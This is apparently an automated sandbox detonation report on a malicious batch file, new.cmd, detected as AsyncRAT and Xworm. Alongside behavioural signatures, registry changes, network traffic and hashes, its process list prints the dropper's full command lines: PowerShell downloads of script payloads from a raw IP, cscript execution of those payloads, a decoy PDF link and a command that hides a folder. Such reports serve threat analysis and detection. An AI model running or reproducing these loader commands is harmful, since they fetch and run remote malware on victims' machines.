Analysis Overview
SHA256
7fbbf18707d9c9964fe3c3f3885994528e2249c7e04f000e216b1d9608126f1f
Threat Level: Known bad
The file new.cmd was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Program crash
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-03 10:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 10:59
Reported
2024-06-03 11:01
Platform
win7-20240220-en
Max time kernel
120s
Max time network
129s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{502062A1-2198-11EF-AD12-DE87C8C490F0} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423574221" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000030b51b856f0a7140ae8ed14a39cf7624000000000200000000001066000000010000200000006330c05abcb8e49f0d6074382c177196f79366e9c7bbd9b8263fadfe1d43fde4000000000e80000000020000200000004bdde88b417c0ac9c49835a292cde98a81940770cc4d08009d60e5d2ce0920659000000056d9e1833f56349bcf9d45a80b3bf3a81a9f6c2b95dd1d2fb812025e808571e4fdb3bc1288ee11b3c7559b8e550218741e1099267ddc45e95b4b143e6cc0aac14d4de8441b9a5839199237e52880d489302653cd500a9e1f70c75be187a31e36ce93780ca29c6c92dcd0d497422b4b935299b25273f4079aa6d05c8d4d7670fe90313c60b6228a1856241040b8f07bbb40000000cbeac3efc29555fa4ff5a173df14a1b41fffaefe4918327988b13d954568fa02c8e01931c9f70f376549fe27db5d90ca8c1e86e2645682aee37d0b52c3600800 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000030b51b856f0a7140ae8ed14a39cf7624000000000200000000001066000000010000200000000ec108577b4df761e94da3d1f4ce260b40edfea678f340fe36e357c60d39cbed000000000e80000000020000200000000072e84e32dcf0ff5fbcf821f7367cda1a180f79d87e145f5b857982c6fcaef920000000bcafad88c6417e653fe75f915937a7c1b0ad8ba0b6e6e450b6d6b41aec8aa360400000000002e28448ed2ebefb33904b51886b4fb70af3181573c223d3ab1d52a8ffd6350c6844806e4915c0b3ebe572280ded73279da54f07bac998508603a77d140422 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0873f26a5b5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2516 CREDAT:275457 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2516 CREDAT:275461 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//startup.cmd' -OutFile 'C:\Users\Admin\Downloads\startup.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 2052
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//new.js' -OutFile 'C:\Users\Admin\Downloads\new.js' }"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\Downloads\new.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//kam.vbs' -OutFile 'C:\Users\Admin\Downloads\kam.vbs' }"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\Downloads\kam.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//upload.vbs' -OutFile 'C:\Users\Admin\Downloads\upload.vbs' }"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\Downloads\upload.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.vbs' -OutFile 'C:\Users\Admin\Downloads\las.vbs' }"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\Downloads\las.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//time.vbs' -OutFile 'C:\Users\Admin\Downloads\time.vbs' }"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\Downloads\time.vbs"
C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Downloads\Python"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gravity-finger-rp-sympathy.trycloudflare.com | udp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| BE | 23.14.90.73:80 | apps.identrust.com | tcp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2604-27-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp
memory/2604-28-0x000000001B540000-0x000000001B822000-memory.dmp
memory/2604-29-0x00000000021F0000-0x00000000021F8000-memory.dmp
memory/2604-30-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-31-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-32-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-33-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-34-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | aa56347e58f9fe55523b4203caf52746 |
| SHA1 | d13913ede037c51d61afe0860d50a714380fda4a |
| SHA256 | f4048153ec34f57e845a099eecdd3b4aeaa4b23fda7a0fd6d206d6104d2a2d16 |
| SHA512 | 9588b568ecf8e3ab60c2b306208cd6eedfd190b73f6080ca99907e34d54a36d88742b29d3397ddb6d8fb03f7042e3c4e531f63b4ae862de2a40bebdd28571158 |
C:\Users\Admin\AppData\Local\Temp\Cab1C66.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/1584-60-0x000000001B730000-0x000000001BA12000-memory.dmp
memory/1584-61-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar1D98.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 72e0a8ead2005e7739e72b48bce1d720 |
| SHA1 | 9e1be19d8242753778777893b182a86c7f148f6d |
| SHA256 | 33bcb13f4acabd5eee637f2e6ad45ff56604d18ceb0e6ec25c83d59c5ab4e0ef |
| SHA512 | 3d68a9b94367ad01f4126c172093d9f257553cb41b5d906170d60da5b2e5bd98595a5ffec6a31d6f527f0ac88fa6d3249030c9c7312a8e58f9872a82e1690317 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1400-169-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/1400-170-0x0000000001F40000-0x0000000001F48000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dc977122bc12d90655beee58d34cc2fd |
| SHA1 | 7fe067a7acf329df23af591d8d8811d01eed243c |
| SHA256 | 1c9172b01a57d74e4ff8da4bc322c092dff60f6d8308d9ea0b8f0ab2ec70ce59 |
| SHA512 | 931dc539564798e0b925b48b739462b809f4c98ae3cc710f1069776c88d78df1965cd07d0f7c505557ddb4d114c232db9a04d63e4add24108b3418b039240b57 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9069d5a5f7c68738bd48e1c56e36fd92 |
| SHA1 | cd90c2ebb20ec8a431f718a0190290215db18ace |
| SHA256 | c6922c7e03dbb7dee8ae6ae40af568b967265c6394ae11f849c39502aae90603 |
| SHA512 | 09bf6da13ebf82053412a1b2386705e824fa9f4d92a6d865477533e6fbf392e805d7c5d86112bc58c016da85a5b24b788805cdb1d15dc67234196092b4847ac9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61
| MD5 | 5ae8478af8dd6eec7ad4edf162dd3df1 |
| SHA1 | 55670b9fd39da59a9d7d0bb0aecb52324cbacc5a |
| SHA256 | fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca |
| SHA512 | a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61
| MD5 | 5bbfc07e72d8f4ee39484501ed16a8bc |
| SHA1 | 00bd691bcd4933ae3a58c1c49817fe8e753e2c7b |
| SHA256 | eeb1527f9b1ad98a39396940a016f59085580c95a9f9f96c6ad713c5d45008aa |
| SHA512 | 64eb4ed3482b2cce65f91b4209fa00f9a60c80c808f08da9a489c99260eab9b4c39e1ebeabae80e2d1b7a208dc088eeb7005b3a1c692e8013fc66904a3c0583f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | f2a549f6248f9ef9242b18de2ef515ab |
| SHA1 | 1f4443b696e44c336a83bec5768978fb759a7ed4 |
| SHA256 | e0d9490cd4025365c7dbb84c37c7313d01bbbd4575714eeb1b07501088e615b7 |
| SHA512 | 86727189bf8545e5b738f88151119302150095d70c91770e3d7821a5ebc1bc9dc1c942c94211305d076e4d1db97091d29bc5d40f4409d191fcac5afcfca20a3d |
memory/2976-251-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/2976-252-0x0000000002070000-0x0000000002078000-memory.dmp
memory/2412-260-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/2412-261-0x0000000002710000-0x0000000002718000-memory.dmp
memory/2864-267-0x0000000002040000-0x0000000002048000-memory.dmp
memory/780-273-0x0000000002820000-0x0000000002828000-memory.dmp
memory/1540-294-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/1540-295-0x00000000026E0000-0x00000000026E8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ce4e36e56657fb306b981c29cf9db04b |
| SHA1 | ae7a19bafa65fe6a45eb844378dda8932c2e9894 |
| SHA256 | 0c5354ac40bb6b0e35a4dc53412b8205987a5bd797322e5cf4a862e277e3402e |
| SHA512 | 8fd729f87aaee46e38213b166b5f4886862c2ef92c01e996a6d650b4546b9d0339830ffcf28d5060a6d9ecadf56627e24be76bac0f462a06b81685874e5e0caf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 7771129958f04efcd875695ea938d642 |
| SHA1 | c65833e11dd04555b159388ad8d0dc53e3e5bda5 |
| SHA256 | 3f191936d2850579d66a3a5ba49d192725eca4c96fa69561e525779116e27aae |
| SHA512 | e2c727c22bd2dc7edcfa4c9825b176ce9820f98f5e8224352e0a326667ed50d16752f85e107c781d71a49a8b98da935d3ba6fc659b41ab66fd3b6aca199b75b3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
